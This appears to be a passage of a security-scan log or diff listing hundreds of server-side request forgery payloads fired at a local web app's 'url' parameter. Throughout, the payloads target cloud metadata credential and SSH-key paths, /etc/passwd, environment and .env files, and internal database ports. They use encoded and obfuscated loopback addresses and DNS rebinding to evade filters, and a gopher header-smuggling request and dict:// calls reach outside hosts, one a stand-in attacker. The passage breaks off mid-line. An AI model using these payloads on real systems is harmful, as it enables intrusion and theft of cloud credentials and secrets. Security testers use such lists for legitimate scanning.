`http://localhost:4200/api/tasks?url=instance-data` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A22` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A443` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/tasks?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/tasks?url=loopback` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A22` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A80` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A443` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/tasks?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/tasks?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tasks?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/tasks?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/tasks?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/tasks?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/tasks?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/tasks?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/tasks?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/tasks?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tasks?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tasks?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tasks?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tasks?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tasks?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tasks?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tasks?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tasks?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tasks?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/tasks?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/tasks?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tasks?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tasks?url=0%2F` +- Testing: `http://localhost:4200/api/tasks?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/teaching_periods +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/teaching_periods?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/teaching_periods?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/teaching_periods?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=0` +- Testing: `http://localhost:4200/api/teaching_periods?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.127.127.127` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.1.3` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.0` +- Testing: `http://localhost:4200/api/teaching_periods?url=2130706433` +- Testing: `http://localhost:4200/api/teaching_periods?url=017700000001` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x7f000001` +- Testing: `http://localhost:4200/api/teaching_periods?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=` +- Testing: `http://localhost:4200/api/teaching_periods?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=` +- Testing: `http://localhost:4200/api/teaching_periods?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=google.com.localhost` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=localtest.me` +- Testing: `http://localhost:4200/api/teaching_periods?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/teaching_periods?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/teaching_periods?url=2130706433%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=3232235521%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=3232235777%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/teaching_periods?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/teaching_periods?url=0%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=localtest.me` +- Testing: `http://localhost:4200/api/teaching_periods?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/teaching_periods?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/teaching_periods?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/teaching_periods?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.1.3` +- Testing: `http://localhost:4200/api/teaching_periods?url=0` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost` +- Testing: `http://localhost:4200/api/teaching_periods?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/teaching_periods?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/teaching_periods?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/teaching_periods?url=7F000001` +- Testing: `http://localhost:4200/api/teaching_periods?url=2130706433` +- Testing: `http://localhost:4200/api/teaching_periods?url=6425673729` +- Testing: `http://localhost:4200/api/teaching_periods?url=127001` +- Testing: `http://localhost:4200/api/teaching_periods?url=127_0._0_1` +- Testing: `http://localhost:4200/api/teaching_periods?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/teaching_periods?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/teaching_periods?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/teaching_periods?url=localtest.me` +- Testing: `http://localhost:4200/api/teaching_periods?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.127.127.127` +- Testing: `http://localhost:4200/api/teaching_periods?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x7f000001` +- Testing: `http://localhost:4200/api/teaching_periods?url=017700000001` +- Testing: `http://localhost:4200/api/teaching_periods?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/teaching_periods?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/teaching_periods?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/teaching_periods?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/teaching_periods?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254` +- Testing: `http://localhost:4200/api/teaching_periods?url=2852039166` +- Testing: `http://localhost:4200/api/teaching_periods?url=7147006462` +- Testing: `http://localhost:4200/api/teaching_periods?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/teaching_periods?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/teaching_periods?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/teaching_periods?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/teaching_periods?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/teaching_periods?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/teaching_periods?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/teaching_periods?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/teaching_periods?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/teaching_periods?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/teaching_periods?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/teaching_periods?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/teaching_periods?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/teaching_periods?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/teaching_periods?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/teaching_periods?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/teaching_periods?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/teaching_periods?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/teaching_periods?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/teaching_periods?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/teaching_periods?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/teaching_periods?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.0` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/teaching_periods?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: 